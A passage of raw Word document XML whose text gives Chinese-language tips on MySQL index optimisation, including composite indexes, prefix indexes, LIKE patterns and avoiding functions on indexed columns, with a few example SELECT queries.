          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、复合索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>比如有一条语句是这样的：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>select * from users where area='beijing' and age=22;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如果我们是在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>area</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上分别创建单个索引的话，由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查询每次只能使用一个索引，所以虽然这样已经相对不做索引时全表扫描提高了很多效率，但是如果在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>area</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>age</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>两列上创建复合索引的话将带来更高的效率。如果我们创建了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(area, age, salary)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的复合索引，那么其实相当于创建了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(area,age,salary)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(area,age)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(area)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>三个索引，这被称为最佳左前缀特性。因此我们在创建复合索引时应该将最常用作限制条件的列放在最左边，依次递减。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、索引不会包含有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值的列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>只要列中包含有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值都将不会被包含在索引中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D3697F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>复合索引中只要有一列含有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D3697F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D3697F">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>值，那么这一列对于此复合索引就是无效的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。所以我们在数据库设计时不要让字段的默认值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、使用短索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对串列进行索引，如果可能应该指定一个前缀长度。例如，如果有一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CHAR(255)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>列，如果在前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个字符内，多数值是惟一的，那么就不要对整个列进行索引。短索引不仅可以提高查询速度而且可以节省磁盘空间和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、排序的索引问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查询只使用一个索引，因此如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>子句中已经使用了索引的话，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>order by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中的列是不会使用索引的。因此数据库默认排序可以符合要求的情况下不要使用排序操作；尽量不要包含多个列的排序，如果需要最好给这些列创建复合索引。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>语句操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一般情况下不鼓励使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作，如果非使用不可，如何使用也是一个问题。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">like “%aaa%” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不会使用索引而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>like “aaa%”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以使用索引。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="002F5226">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不要在列上进行运算</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>select * from users where YEAR(adddate)&lt;2007;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将在每个行上进行运算，这将导致索引失效而进行全表扫描，因此我们可以改成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>select * from users where adddate&lt;‘2007-01-01';</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、不使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NOT IN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NOT IN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作都不会使用索引将进行全表扫描。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NOT IN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NOT EXISTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代替，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id&lt;&gt;3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>则可使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id&gt;3 or id&lt;3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来代替。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00843AB1" w:rsidRDefault="00D84D13" w:rsidP="00113CFB">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>19.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
